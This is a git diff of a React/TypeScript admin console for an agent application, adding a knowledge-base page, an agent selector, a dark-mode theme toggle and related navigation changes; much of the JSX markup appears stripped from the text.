+ running: boolean; + completed: boolean; + failed: boolean; + total_sessions: number; + traversed_sessions: number; + processed_sessions: number; + current_session_id?: string | null; + error?: string | null; + updated_at?: string | null; + reason?: string | null; +} + +export interface KnowledgeHistoryBackfillRunResponse { + result: { + changed: boolean; + skipped: boolean; + reason?: string; + processed_sessions?: number; + file_sources?: number; + url_sources?: number; + text_sources?: number; + }; + status: KnowledgeHistoryBackfillStatus; +} + +export interface KnowledgeSourceDocument { + path: string; + title: string; + text: string; +} + +export interface KnowledgeSourceContent { + indexed: boolean; + indexed_at?: string | null; + document_count?: number; + chunk_count?: number; + documents: KnowledgeSourceDocument[]; +} + +export interface KnowledgeClearResponse { + cleared: boolean; + cleared_indexes: number; + cleared_sources: number; + removed_source_configs: boolean; +} + +export interface KnowledgeRestoreResponse { + success: boolean; + replace_existing: boolean; + restored_sources: number; +} \ No newline at end of file diff --git a/console/src/components/AgentSelector/index.module.less b/console/src/components/AgentSelector/index.module.less new file mode 100644 index 000000000..e7ac55360 --- /dev/null +++ b/console/src/components/AgentSelector/index.module.less @@ -0,0 +1,397 @@ +// ─── Wrapper ────────────────────────────────────────────────────────────────── +.agentSelectorWrapper { + display: flex; + align-items: center; + gap: 8px; + padding: 0; + background: transparent; + border: none; + transition: all 0.2s ease; +} + +// ─── Label ──────────────────────────────────────────────────────────────────── +.agentSelectorLabel { + display: flex; + align-items: center; + gap: 6px; + font-size: 12px; + font-weight: 500; + color: rgba(0, 0, 0, 0.4); + white-space: nowrap; + user-select: none; + + svg { + opacity: 0.5; + } +} + +// ─── Select Component ───────────────────────────────────────────────────────── +.agentSelector { + min-width: 180px; + + :global { + .ant-select-selector { + border: 1px solid rgba(97, 92, 237, 0.25) !important; + background: rgba(97, 92, 237, 0.04) !important; + box-shadow: none !important; + padding: 4px 8px !important; + height: 32px !important; + font-size: 13px; + font-weight: 500; + border-radius: 8px !important; + transition: all 0.2s ease; + + &:hover { + border-color: rgba(97, 92, 237, 0.45) !important; + background: rgba(97, 92, 237, 0.07) !important; + } + + &:focus { + border-color: #615ced !important; + background: #ffffff !important; + box-shadow: 0 0 0 2px rgba(97, 92, 237, 0.12) !important; + } + } + + .ant-select-selection-item { + padding: 0 !important; + line-height: 22px; + } + + .ant-select-arrow { + color: rgba(97, 92, 237, 0.5); + right: 8px; + + .ant-select-suffix { + display: flex; + align-items: center; + } + } + + .ant-select-focused { + .ant-select-selector { + border-color: #615ced !important; + background: #ffffff !important; + box-shadow: 0 0 0 2px rgba(97, 92, 237, 0.12) !important; + } + } + } +} + +// ─── Selected Agent Label ───────────────────────────────────────────────────── +.selectedAgentLabel { + display: flex; + align-items: center; + gap: 6px; + color: rgba(0, 0, 0, 0.85); + + svg { + flex-shrink: 0; + color: #615ced; + opacity: 0.85; + } + + span { + font-weight: 600; + font-size: 13px; + } +} + +// ─── Agent Badge ────────────────────────────────────────────────────────────── +.agentSelectorSuffix { + display: flex; + align-items: center; + gap: 6px; + margin-right: 0; + + .agentBadge { + :global { + .ant-badge-count { + background: linear-gradient(135deg, #615ced, #8b87f0); + color: #ffffff; + font-size: 10px; + font-weight: 700; + min-width: 18px; + height: 18px; + line-height: 18px; + border-radius: 9px; + box-shadow: 0 2px 6px rgba(97, 92, 237, 0.35); + } + } + } +} + +// ─── Dropdown ───────────────────────────────────────────────────────────────── +.agentSelectorDropdown { + border-radius: 12px !important; + overflow: hidden; + min-width: 280px !important; + box-shadow: + 0 8px 32px rgba(0, 0, 0, 0.12), + 0 2px 8px rgba(0, 0, 0, 0.06) !important; + :global { + .copaw-select-item { + padding: 0 !important; + border-radius: 8px; + margin: 3px 6px; + transition: all 0.15s cubic-bezier(0.4, 0, 0.2, 1); + + &:hover { + background: rgba(97, 92, 237, 0.08) !important; + } + + &.copaw-select-item-option-selected { + background: rgba(97, 92, 237, 0.05) !important; + + .agentOptionIcon { + background: linear-gradient(135deg, #615ced 0%, #8b87f0 100%); + border-color: transparent; + color: #ffffff; + box-shadow: 0 2px 8px rgba(97, 92, 237, 0.4); + } + } + } + + .ant-select-item { + padding: 0 !important; + border-radius: 8px; + margin: 3px 6px; + transition: all 0.15s cubic-bezier(0.4, 0, 0.2, 1); + + &:hover { + background: rgba(97, 92, 237, 0.08) !important; + } + + &.ant-select-item-option-selected { + background: rgba(97, 92, 237, 0.05) !important; + + .agentOptionIcon { + background: linear-gradient(135deg, #615ced 0%, #8b87f0 100%); + border-color: transparent; + color: #ffffff; + box-shadow: 0 2px 8px rgba(97, 92, 237, 0.4); + } + } + } + + .rc-virtual-list { + padding: 6px 0; + } + } +} + +// ─── Agent Option ───────────────────────────────────────────────────────────── +.agentOption { + padding: 10px 14px; + display: flex; + flex-direction: column; + gap: 6px; +} + +.agentOptionHeader { + display: flex; + align-items: center; + gap: 10px; +} + +.agentOptionIcon { + flex-shrink: 0; + width: 30px; + height: 30px; + display: flex; + align-items: center; + justify-content: center; + background: linear-gradient(135deg, #f5f5ff 0%, #efefff 100%); + border: 1px solid rgba(97, 92, 237, 0.15); + border-radius: 8px; + color: #615ced; + transition: all 0.2s ease; + + .agentOption:hover & { + background: linear-gradient(135deg, #ebe9ff 0%, #f0efff 100%); + border-color: rgba(97, 92, 237, 0.3); + color: #615ced; + box-shadow: 0 2px 6px rgba(97, 92, 237, 0.15); + } +} + +.agentOptionContent { + flex: 1; + min-width: 0; + display: flex; + flex-direction: column; + gap: 2px; +} + +.agentOptionName { + display: flex; + align-items: center; + gap: 6px; + font-size: 13px; + font-weight: 600; + color: #1a1a2e; + line-height: 1.4; + + span { + flex: 1; + overflow: hidden; + text-overflow: ellipsis; + white-space: nowrap; + } +} + +.activeIndicator { + flex-shrink: 0; + color: #52c41a; + animation: fadeIn 0.3s ease; +} + +@keyframes fadeIn { + from { + opacity: 0; + transform: scale(0.8); + } + to { + opacity: 1; + transform: scale(1); + } +} + +.agentOptionDescription { + font-size: 11px; + color: #8c8c8c; + line-height: 1.4; + overflow: hidden; + text-overflow: ellipsis; + white-space: nowrap; +} + +.agentOptionId { + font-size: 10px; + font-family: "SF Mono", "Consolas", "Monaco", monospace; + color: rgba(97, 92, 237, 0.4); + letter-spacing: 0.3px; + padding-top: 4px; + border-top: 1px solid rgba(97, 92, 237, 0.06); +} + +// ─── Dark mode overrides ─────────────────────────────────────────────────────── +:global(.dark-mode) { + .agentSelectorLabel { + color: rgba(255, 255, 255, 0.55); + + svg { + opacity: 0.7; + } + } + + .agentSelector { + :global { + .ant-select-selector { + border-color: rgba(139, 135, 240, 0.3) !important; + background: rgba(97, 92, 237, 0.1) !important; + + &:hover { + border-color: rgba(139, 135, 240, 0.5) !important; + background: rgba(97, 92, 237, 0.15) !important; + } + + &:focus { + border-color: #8b87f0 !important; + background: rgba(97, 92, 237, 0.15) !important; + box-shadow: 0 0 0 2px rgba(97, 92, 237, 0.25) !important; + } + } + + .ant-select-arrow { + color: rgba(139, 135, 240, 0.6); + } + + .ant-select-focused .ant-select-selector { + border-color: #8b87f0 !important; + background: rgba(97, 92, 237, 0.15) !important; + box-shadow: 0 0 0 2px rgba(97, 92, 237, 0.25) !important; + } + } + } + + .selectedAgentLabel { + color: rgba(255, 255, 255, 0.9); + + svg { + color: #b8b5f5; + opacity: 0.9; + } + } + + .agentSelectorSuffix { + .agentBadge { + :global { + .ant-badge-count { + background: linear-gradient(135deg, #615ced, #8b87f0); + color: #ffffff; + box-shadow: 0 2px 6px rgba(97, 92, 237, 0.4); + } + } + } + } + + .agentSelectorDropdown { + box-shadow: + 0 8px 32px rgba(0, 0, 0, 0.4), + 0 2px 8px rgba(0, 0, 0, 0.2) !important; + + :global { + .ant-select-item { + &:hover { + background: rgba(255, 255, 255, 0.1) !important; + } + + &.ant-select-item-option-selected { + background: rgba(255, 255, 255, 0.06) !important; + + .agentOptionIcon { + background: linear-gradient(135deg, #615ced 0%, #8b87f0 100%); + border-color: transparent; + color: #ffffff; + box-shadow: 0 2px 8px rgba(97, 92, 237, 0.5); + } + } + } + } + } + + .agentOptionIcon { + background: linear-gradient( + 135deg, + rgba(97, 92, 237, 0.15) 0%, + rgba(97, 92, 237, 0.08) 100% + ); + border-color: rgba(139, 135, 240, 0.2); + color: #b8b5f5; + + .agentOption:hover & { + background: linear-gradient( + 135deg, + rgba(97, 92, 237, 0.3) 0%, + rgba(97, 92, 237, 0.15) 100% + ); + border-color: rgba(139, 135, 240, 0.4); + color: #c5c3f8; + box-shadow: 0 2px 8px rgba(97, 92, 237, 0.3); + } + } + + .agentOptionName { + color: rgba(255, 255, 255, 0.88); + } + + .agentOptionDescription { + color: rgba(255, 255, 255, 0.4); + } + + .agentOptionId { + color: rgba(139, 135, 240, 0.45); + border-top-color: rgba(139, 135, 240, 0.1); + } +} diff --git a/console/src/components/AgentSelector/index.tsx b/console/src/components/AgentSelector/index.tsx new file mode 100644 index 000000000..1add988a0 --- /dev/null +++ b/console/src/components/AgentSelector/index.tsx @@ -0,0 +1,100 @@ +import { Select, message, Badge } from "antd"; +import { useEffect, useState } from "react"; +import { Bot, Layers, CheckCircle } from "lucide-react"; +import { useAgentStore } from "../../stores/agentStore"; +import { agentsApi } from "../../api/modules/agents"; +import { useTranslation } from "react-i18next"; +import styles from "./index.module.less"; + +export default function AgentSelector() { + const { t } = useTranslation(); + const { selectedAgent, agents, setSelectedAgent, setAgents } = + useAgentStore(); + const [loading, setLoading] = useState(false); + + useEffect(() => { + loadAgents(); + }, []); + + const loadAgents = async () => { + try { + setLoading(true); + const data = await agentsApi.listAgents(); + setAgents(data.agents); + } catch (error) { + console.error("Failed to load agents:", error); + message.error(t("agent.loadFailed")); + } finally { + setLoading(false); + } + }; + + const handleChange = (value: string) => { + setSelectedAgent(value); + message.success(t("agent.switchSuccess")); + }; + + const agentCount = agents.length; + + return ( +
+
+ + {t("agent.currentWorkspace")} +
+ +
+ ); +} diff --git a/console/src/components/ThemeToggleButton/index.module.less b/console/src/components/ThemeToggleButton/index.module.less new file mode 100644 index 000000000..4ff0a6b7e --- /dev/null +++ b/console/src/components/ThemeToggleButton/index.module.less @@ -0,0 +1,36 @@ +/* ---- Theme toggle button ---- */ +.toggleBtn { + display: inline-flex; + align-items: center; + justify-content: center; + height: 32px; + border: none; + border-radius: 8px; + background: transparent; + cursor: pointer; + transition: + background 0.15s ease, + color 0.15s ease; + color: #555; + padding: 0; + flex-shrink: 0; + + &:hover { + background: rgba(97, 92, 237, 0.08); + color: #615ced; + } +} + +.icon { + font-size: 16px; +} + +/* Dark mode overrides */ +:global(.dark-mode) .toggleBtn { + color: #ccc; + + &:hover { + background: rgba(255, 255, 255, 0.1); + color: #fff; + } +} diff --git a/console/src/components/ThemeToggleButton/index.tsx b/console/src/components/ThemeToggleButton/index.tsx new file mode 100644 index 000000000..532c1cf79 --- /dev/null +++ b/console/src/components/ThemeToggleButton/index.tsx @@ -0,0 +1,28 @@ +import { Tooltip, Button } from "antd"; +import { SunOutlined, MoonOutlined } from "@ant-design/icons"; +import { useTheme } from "../../contexts/ThemeContext"; +import { useTranslation } from "react-i18next"; +import styles from "./index.module.less"; + +/** + * ThemeToggleButton - toggles between light and dark theme. + * Displays a sun icon in dark mode and a moon icon in light mode. + */ +export default function ThemeToggleButton() { + const { isDark, toggleTheme } = useTheme(); + const { t } = useTranslation(); + + return ( + + + + ); +} diff --git a/console/src/constants/timezone.ts b/console/src/constants/timezone.ts new file mode 100644 index 000000000..d88d5096f --- /dev/null +++ b/console/src/constants/timezone.ts @@ -0,0 +1,21 @@ +export const TIMEZONE_OPTIONS = [ + { value: "America/Los_Angeles", label: "America/Los_Angeles (UTC-8)" }, + { value: "America/Denver", label: "America/Denver (UTC-7)" }, + { value: "America/Chicago", label: "America/Chicago (UTC-6)" }, + { value: "America/New_York", label: "America/New_York (UTC-5)" }, + { value: "America/Toronto", label: "America/Toronto (UTC-5)" }, + { value: "UTC", label: "UTC" }, + { value: "Europe/London", label: "Europe/London (UTC+0)" }, + { value: "Europe/Paris", label: "Europe/Paris (UTC+1)" }, + { value: "Europe/Berlin", label: "Europe/Berlin (UTC+1)" }, + { value: "Europe/Moscow", label: "Europe/Moscow (UTC+3)" }, + { value: "Asia/Dubai", label: "Asia/Dubai (UTC+4)" }, + { value: "Asia/Shanghai", label: "Asia/Shanghai (UTC+8)" }, + { value: "Asia/Hong_Kong", label: "Asia/Hong_Kong (UTC+8)" }, + { value: "Asia/Singapore", label: "Asia/Singapore (UTC+8)" }, + { value: "Asia/Tokyo", label: "Asia/Tokyo (UTC+9)" }, + { value: "Asia/Seoul", label: "Asia/Seoul (UTC+9)" }, + { value: "Australia/Sydney", label: "Australia/Sydney (UTC+10)" }, + { value: "Australia/Melbourne", label: "Australia/Melbourne (UTC+10)" }, + { value: "Pacific/Auckland", label: "Pacific/Auckland (UTC+12)" }, +]; diff --git a/console/src/contexts/ThemeContext.tsx b/console/src/contexts/ThemeContext.tsx new file mode 100644 index 000000000..15e04568c --- /dev/null +++ b/console/src/contexts/ThemeContext.tsx @@ -0,0 +1,104 @@ +import { + createContext, + useContext, + useEffect, + useState, + useCallback, + type ReactNode, +} from "react"; + +export type ThemeMode = "light" | "dark" | "system"; +export type ResolvedTheme = "light" | "dark"; + +const STORAGE_KEY = "copaw-theme"; + +interface ThemeContextValue { + /** User selected preference: light / dark / system */ + themeMode: ThemeMode; + /** Resolved final theme after applying system preference */ + isDark: boolean; + setThemeMode: (mode: ThemeMode) => void; + /** Convenience toggle: light ↔ dark (skips system) */ + toggleTheme: () => void; +} + +const ThemeContext = createContext({ + themeMode: "light", + isDark: false, + setThemeMode: () => {}, + toggleTheme: () => {}, +}); + +function getInitialMode(): ThemeMode { + try { + const stored = localStorage.getItem(STORAGE_KEY); + if (stored === "light" || stored === "dark" || stored === "system") { + return stored; + } + } catch { + // ignore storage errors + } + return "system"; +} + +function resolveIsDark(mode: ThemeMode): boolean { + if (mode === "dark") return true; + if (mode === "light") return false; + // system + return window.matchMedia?.("(prefers-color-scheme: dark)").matches ?? false; +} + +export function ThemeProvider({ children }: { children: ReactNode }) { + const [themeMode, setThemeModeState] = useState(getInitialMode); + const [isDark, setIsDark] = useState(() => + resolveIsDark(getInitialMode()), + ); + + // Apply dark/light class to element for global CSS variable overrides + useEffect(() => { + const html = document.documentElement; + if (isDark) { + html.classList.add("dark-mode"); + } else { + html.classList.remove("dark-mode"); + } + }, [isDark]); + + // Listen to system theme changes when mode is "system" + useEffect(() => { + if (themeMode !== "system") return; + + const mq = window.matchMedia("(prefers-color-scheme: dark)"); + const handler = (e: MediaQueryListEvent) => { + setIsDark(e.matches); + }; + mq.addEventListener("change", handler); + return () => mq.removeEventListener("change", handler); + }, [themeMode]); + + const setThemeMode = useCallback((mode: ThemeMode) => { + setThemeModeState(mode); + setIsDark(resolveIsDark(mode)); + try { + localStorage.setItem(STORAGE_KEY, mode); + } catch { + // ignore + } + }, []); + + const toggleTheme = useCallback(() => { + setThemeMode(isDark ? "light" : "dark"); + }, [isDark, setThemeMode]); + + return ( + + {children} + + ); +} + +export function useTheme(): ThemeContextValue { + return useContext(ThemeContext); +} diff --git a/console/src/layouts/Header.tsx b/console/src/layouts/Header.tsx index 94975d310..c21622536 100644 --- a/console/src/layouts/Header.tsx +++ b/console/src/layouts/Header.tsx @@ -1,5 +1,7 @@ import { Layout, Space } from "antd"; import LanguageSwitcher from "../components/LanguageSwitcher"; +import ThemeToggleButton from "../components/ThemeToggleButton"; +import AgentSelector from "../components/AgentSelector"; import { useTranslation } from "react-i18next"; import { FileTextOutlined, @@ -12,13 +14,8 @@ import styles from "./index.module.less"; const { Header: AntHeader } = Layout; -// Navigation URLs -const NAV_URLS = { - docs: "https://copaw.agentscope.io/docs/intro", - faq: "https://copaw.agentscope.io/docs/faq", - changelog: "https://github.com/agentscope-ai/CoPaw/releases", - github: "https://github.com/agentscope-ai/CoPaw", -} as const; +// Constants +const GITHUB_URL = "https://github.com/agentscope-ai/CoPaw" as const; const keyToLabel: Record = { chat: "nav.chat", @@ -26,6 +23,7 @@ const keyToLabel: Record = { sessions: "nav.sessions", "cron-jobs": "nav.cronJobs", heartbeat: "nav.heartbeat", + knowledge: "nav.knowledge", skills: "nav.skills", tools: "nav.tools", mcp: "nav.mcp", @@ -35,24 +33,35 @@ const keyToLabel: Record = { environments: "nav.environments", security: "nav.security", "token-usage": "nav.tokenUsage", + agents: "nav.agents", }; +// URL helper functions +const getWebsiteLang = (lang: string): string => + lang.startsWith("zh") ? "zh" : "en"; + +const getDocsUrl = (lang: string): string => + `https://copaw.agentscope.io/docs/intro?lang=${getWebsiteLang(lang)}`; + +const getFaqUrl = (lang: string): string => + `https://copaw.agentscope.io/docs/faq?lang=${getWebsiteLang(lang)}`; + +const getReleaseNotesUrl = (lang: string): string => + `https://copaw.agentscope.io/release-notes?lang=${getWebsiteLang(lang)}`; + interface HeaderProps { selectedKey: string; } export default function Header({ selectedKey }: HeaderProps) { - const { t } = useTranslation(); + const { t, i18n } = useTranslation(); const handleNavClick = (url: string) => { if (url) { - // Check if running in pywebview environment const pywebview = (window as any).pywebview; - if (pywebview && pywebview.api) { - // Use pywebview API to open external link in system browser + if (pywebview?.api) { pywebview.api.open_external_link(url); } else { - // Normal browser environment window.open(url, "_blank"); } } @@ -64,11 +73,12 @@ export default function Header({ selectedKey }: HeaderProps) { {t(keyToLabel[selectedKey] || "nav.chat")} + @@ -77,7 +87,7 @@ export default function Header({ selectedKey }: HeaderProps) { @@ -86,7 +96,7 @@ export default function Header({ selectedKey }: HeaderProps) { @@ -95,12 +105,13 @@ export default function Header({ selectedKey }: HeaderProps) { + ); diff --git a/console/src/layouts/MainLayout/index.tsx b/console/src/layouts/MainLayout/index.tsx index d8f39a17d..e8224c882 100644 --- a/console/src/layouts/MainLayout/index.tsx +++ b/console/src/layouts/MainLayout/index.tsx @@ -1,6 +1,5 @@ import { Layout } from "antd"; -import { useEffect } from "react"; -import { Routes, Route, useLocation, useNavigate } from "react-router-dom"; +import { Routes, Route, useLocation, Navigate } from "react-router-dom"; import Sidebar from "../Sidebar"; import Header from "../Header"; import ConsoleCronBubble from "../../components/ConsoleCronBubble"; @@ -11,6 +10,7 @@ import SessionsPage from "../../pages/Control/Sessions"; import CronJobsPage from "../../pages/Control/CronJobs"; import HeartbeatPage from "../../pages/Control/Heartbeat"; import AgentConfigPage from "../../pages/Agent/Config"; +import KnowledgePage from "../../pages/Agent/Knowledge"; import SkillsPage from "../../pages/Agent/Skills"; import ToolsPage from "../../pages/Agent/Tools"; import WorkspacePage from "../../pages/Agent/Workspace"; @@ -19,6 +19,8 @@ import ModelsPage from "../../pages/Settings/Models"; import EnvironmentsPage from "../../pages/Settings/Environments"; import SecurityPage from "../../pages/Settings/Security"; import TokenUsagePage from "../../pages/Settings/TokenUsage"; +import VoiceTranscriptionPage from "../../pages/Settings/VoiceTranscription"; +import AgentsPage from "../../pages/Settings/Agents"; const { Content } = Layout; @@ -28,6 +30,7 @@ const pathToKey: Record = { "/sessions": "sessions", "/cron-jobs": "cron-jobs", "/heartbeat": "heartbeat", + "/knowledge": "knowledge", "/skills": "skills", "/tools": "tools", "/mcp": "mcp", @@ -38,20 +41,13 @@ const pathToKey: Record = { "/agent-config": "agent-config", "/security": "security", "/token-usage": "token-usage", + "/voice-transcription": "voice-transcription", }; export default function MainLayout() { const location = useLocation(); - const navigate = useNavigate(); const currentPath = location.pathname; const selectedKey = pathToKey[currentPath] || "chat"; - const isChatPage = currentPath === "/" || currentPath.startsWith("/chat"); - - useEffect(() => { - if (currentPath === "/") { - navigate("/chat", { replace: true }); - } - }, [currentPath, navigate]); return ( @@ -75,6 +71,7 @@ export default function MainLayout() { } /> } /> } /> + } /> } /> } /> } /> diff --git a/console/src/layouts/Sidebar.tsx b/console/src/layouts/Sidebar.tsx index 36252f9cc..41a7d3d72 100644 --- a/console/src/layouts/Sidebar.tsx +++ b/console/src/layouts/Sidebar.tsx @@ -22,6 +22,7 @@ import { UsersRound, CalendarClock, Activity, + Database, Sparkles, Briefcase, Cpu, @@ -36,9 +37,15 @@ import { Copy, Check, BarChart3, + Mic, + Bot, + LogOut, } from "lucide-react"; import api from "../api"; +import { clearAuthToken } from "../api/config"; +import { authApi } from "../api/modules/auth"; import styles from "./index.module.less"; +import { useTheme } from "../contexts/ThemeContext"; const { Sider } = Layout; @@ -57,15 +64,18 @@ const KEY_TO_PATH: Record = { sessions: "/sessions", "cron-jobs": "/cron-jobs", heartbeat: "/heartbeat", + knowledge: "/knowledge", skills: "/skills", tools: "/tools", mcp: "/mcp", workspace: "/workspace", + agents: "/agents", models: "/models", environments: "/environments", "agent-config": "/agent-config", security: "/security", "token-usage": "/token-usage", + "voice-transcription": "/voice-transcription", }; const UPDATE_MD: Record = { @@ -192,6 +202,7 @@ function CopyButton({ text }: { text: string }) { export default function Sidebar({ selectedKey }: SidebarProps) { const navigate = useNavigate(); const { t, i18n } = useTranslation(); + const { isDark } = useTheme(); const [collapsed, setCollapsed] = useState(false); const [openKeys, setOpenKeys] = useState(DEFAULT_OPEN_KEYS); const [version, setVersion] = useState(""); @@ -199,6 +210,14 @@ export default function Sidebar({ selectedKey }: SidebarProps) { const [allVersions, setAllVersions] = useState([]); const [updateModalOpen, setUpdateModalOpen] = useState(false); const [updateMarkdown, setUpdateMarkdown] = useState(""); + const [authEnabled, setAuthEnabled] = useState(false); + + useEffect(() => { + authApi + .getStatus() + .then((res) => setAuthEnabled(res.enabled)) + .catch(() => {}); + }, []); useEffect(() => { if (!collapsed) { @@ -218,9 +237,19 @@ export default function Sidebar({ selectedKey }: SidebarProps) { .then((res) => res.json()) .then((data) => { const releases = data?.releases ?? {}; - // Sort versions by upload_time (newest first) - const versionsWithTime = Object.entries(releases).map( - ([version, files]) => { + + // Filter out pre-release versions (alpha, beta, rc, dev, etc.) + const isStableVersion = (version: string) => { + // Pre-release indicators: a, alpha, b, beta, rc, c, candidate, dev, post + const preReleasePattern = /(a|alpha|b|beta|rc|c|candidate|dev)\d*/i; + // Also check for prerelease field in package info + return !preReleasePattern.test(version); + }; + + // Sort versions by upload_time (newest first), only include stable versions + const versionsWithTime = Object.entries(releases) + .filter(([version]) => isStableVersion(version)) + .map(([version, files]) => { const fileList = files as Array<{ upload_time_iso_8601?: string }>; // Get the latest upload time among all files for this version const latestUpload = fileList @@ -229,16 +258,32 @@ export default function Sidebar({ selectedKey }: SidebarProps) { .sort() .pop(); return { version, uploadTime: latestUpload || "" }; - }, - ); + }); versionsWithTime.sort( (a, b) => new Date(b.uploadTime).getTime() - new Date(a.uploadTime).getTime(), ); const versions = versionsWithTime.map((v) => v.version); const latest = versions[0] ?? data?.info?.version ?? ""; - setAllVersions(versions); - setLatestVersion(latest); + + // Only show update notification if the latest version was released more than 1 hour ago + // This gives Docker images time to build and become available + const oneHourAgo = new Date(Date.now() - 60 * 60 * 1000); + const latestVersionReleaseTime = versionsWithTime.find( + (v) => v.version === latest, + )?.uploadTime; + + if ( + latestVersionReleaseTime && + new Date(latestVersionReleaseTime) <= oneHourAgo + ) { + setAllVersions(versions); + setLatestVersion(latest); + } else { + // If latest version is less than 1 hour old, don't show update notification + setAllVersions([]); + setLatestVersion(""); + } }) .catch(() => {}); }, []); @@ -322,6 +367,11 @@ export default function Sidebar({ selectedKey }: SidebarProps) { label: t("nav.workspace"), icon: , }, + { + key: "knowledge", + label: t("nav.knowledge"), + icon: , + }, { key: "skills", label: t("nav.skills"), icon: }, { key: "tools", label: t("nav.tools"), icon: }, { key: "mcp", label: t("nav.mcp"), icon: }, @@ -337,6 +387,7 @@ export default function Sidebar({ selectedKey }: SidebarProps) { label: t("nav.settings"), icon: , children: [ + { key: "agents", label: t("nav.agents"), icon: }, { key: "models", label: t("nav.models"), icon: }, { key: "environments", @@ -353,6 +404,11 @@ export default function Sidebar({ selectedKey }: SidebarProps) { label: t("nav.tokenUsage"), icon: , }, + { + key: "voice-transcription", + label: t("nav.voiceTranscription"), + icon: , + }, ], }, ]; @@ -362,12 +418,16 @@ export default function Sidebar({ selectedKey }: SidebarProps) { collapsed={collapsed} onCollapse={setCollapsed} width={275} - className={styles.sider} + className={`${styles.sider}${isDark ? ` ${styles.siderDark}` : ""}`} >
{!collapsed && (
- CoPaw + CoPaw {version && ( + {authEnabled && ( +
+ +
+ )} + setUpdateModalOpen(false)} @@ -423,12 +506,13 @@ export default function Sidebar({ selectedKey }: SidebarProps) { + + + + + {showBackfillNowButton ? ( + + ) : null} +
+
+ + + {unifiedBatchProgress.visible ? ( +
+ + {unifiedBatchProgress.label} + + +
+ ) : null} + + + + + +
+ {t("knowledge.search")} + {hits.length > 0 ? ( + + {t("knowledge.searchHitCount", { count: hits.length })} + + ) : null} +
+
+ + { + const value = event.target.value; + setSearchQuery(value); + if (!value.trim() && hits.length > 0) { + setHits([]); + } + }} + placeholder={t("knowledge.searchPlaceholder")} + onPressEnter={handleSearch} + /> + +
+ + +
+
+
+ {showSearchPanel ? ( +
+ {searching ? ( +
+ +
+ ) : hits.length === 0 ? ( +
{t("knowledge.searchEmpty")}
+ ) : ( +
+ + {hits.map((hit) => ( + +
+ + {hit.source_name} + {hit.source_type} + + + {t("knowledge.scoreLabel", { + score: Number(hit.score).toFixed(2), + })} + +
+ {hit.document_title} + + {hit.document_path} + + + {hit.snippet} + +
+ ))} +
+
+ )} +
+ ) : null} +
+ +
+ +
+ + {t("knowledge.noteStyle")} + + setNoteStyle(value as KnowledgeNoteStyle)} + className={styles.noteStyleSegment} + /> +
+
+ +
+ +
+
+ + {t("knowledge.sourceOriginFilter")} + + setSourceTypeFilter(value as KnowledgeSourceType | "all")} + options={[ + { label: t("knowledge.allTypes"), value: "all" }, + ...SOURCE_TYPE_OPTIONS, + ]} + className={styles.filterSelect} + /> +
+
+ {filteredSources.length === 0 ? ( + + ) : ( +
+ {filteredSources.map((record) => { + const originText = getSourceOriginText(record, t); + const remoteLine = formatRemoteStatus(record, t); + const isActiveCard = indexingId === record.id; + const cardSubject = (record.subject || record.name || "").trim(); + const summaryText = (record.summary || "").trim(); + const summaryKeywords = record.keywords || []; + const hideSummaryBlock = + cardSubject.length > 0 && + summaryText.length > 0 && + cardSubject === summaryText; + const indexedCountText = record.status.indexed + ? t("knowledge.indexedCount", { + documents: record.status.document_count, + chunks: record.status.chunk_count, + }) + : "-"; + return ( +
+
+
+
+ + {record.id} + + {record.type} + {originText} +
+
+ +
+ {cardSubject ? ( +
+
+ {t("knowledge.table.subject")} +
+
openDetailDrawer(record)} + onKeyDown={(event) => + handleDetailDrawerValueKeyDown(event, record) + } + className={`${styles.infoBlock} ${styles.clickableBlock}`} + title={cardSubject} + > + + {cardSubject} + +
+
+ ) : null} + + {!hideSummaryBlock ? ( +
+
+ {t("knowledge.table.source")} +
+
openDetailDrawer(record)} + onKeyDown={(event) => + handleDetailDrawerValueKeyDown(event, record) + } + className={`${styles.infoBlock} ${styles.clickableBlock}`} + title={summaryText || t("knowledge.inlineText")} + > + + {summaryText || t("knowledge.inlineText")} + +
+
+ ) : null} + + {summaryKeywords.length > 0 ? ( +
+
+ {t("knowledge.table.keywords")} +
+
+
+ {summaryKeywords.map((keyword) => ( + + {keyword} + + ))} +
+
+
+ ) : null} + + {record.location ? ( +
+
+ {t("knowledge.table.location")} +
+
openDetailDrawer(record)} + onKeyDown={(event) => + handleDetailDrawerValueKeyDown(event, record) + } + className={`${styles.infoBlock} ${styles.singleLineValue} ${styles.clickableBlock}`} + title={record.location} + > + {record.location} +
+
+ ) : null} + +
+
+ {t("knowledge.statusAndStats")} +
+
openDetailDrawer(record)} + onKeyDown={(event) => + handleDetailDrawerValueKeyDown(event, record) + } + className={`${styles.infoBlock} ${styles.clickableBlock}`} + > +
+
+ + {record.status.indexed + ? t("knowledge.indexed") + : t("knowledge.notIndexed")} + +
+ + {indexedCountText} + +
+ {remoteLine ? ( +
+ Remote + {remoteLine} +
+ ) : null} + {record.status.remote_last_error ? ( + + {t("knowledge.remoteLastError", { + error: record.status.remote_last_error, + })} + + ) : null} +
+
+
+ +
+
+ + +
+
+
+
+ ); + })} +
+ )} +
+
+ +
+ + { + setModalOpen(false); + form.resetFields(); + resetDraftState(); + }} + confirmLoading={saving} + destroyOnClose + > +
+ + + + + {t("knowledge.urlHint")} + + + )} + {selectedType === "text" && ( + + + + )} + {selectedType === "chat" && ( + <> + + + + + {t("knowledge.chatHint")} + + + )} + + + + + + +
+
+ + + + + + ) : ( + + + + + ) + } + destroyOnClose={false} + > + + + {t("knowledge.enableConfirmDescription")} + +
+ + + + + + + + + + + + + + + +
+ {enableModalNeedsBackfillChoice ? ( + + {t("knowledge.firstEnableBackfillPrompt", { + count: backfillStatus?.history_chat_count ?? 0, + })} + + ) : ( + + {t("knowledge.enableConfigInlineHint")} + + )} +
+
+ setDetailDrawerOpen(false)} + destroyOnClose + > + {selectedSource ? ( + + {selectedSource.name?.trim() ? ( +
+
{t("knowledge.table.subject")}
+
+ {selectedSource.subject || selectedSource.name} +
+
+ ) : null} + +
+
{t("knowledge.table.source")}
+
+ {selectedSourceSummaryData.summary || t("knowledge.inlineText")} +
+
+ + {selectedSourceSummaryData.keywords.length > 0 ? ( +
+
{t("knowledge.table.keywords")}
+
+
+ {selectedSourceSummaryData.keywords.map((keyword) => ( + + {keyword} + + ))} +
+
+
+ ) : null} + +
+ {selectedSourceOriginText} + {selectedSource.type} +
+ +
+
{t("knowledge.form.id")}
+
+ {selectedSource.id} +
+
+ + {selectedSource.location ? ( +
+
{t("knowledge.table.location")}
+
{selectedSource.location}
+
+ ) : null} + +
+
{t("knowledge.table.chunkStats")}
+
+ {selectedSourceIndexedCountText} +
+
+ +
+
{t("knowledge.table.status")}
+
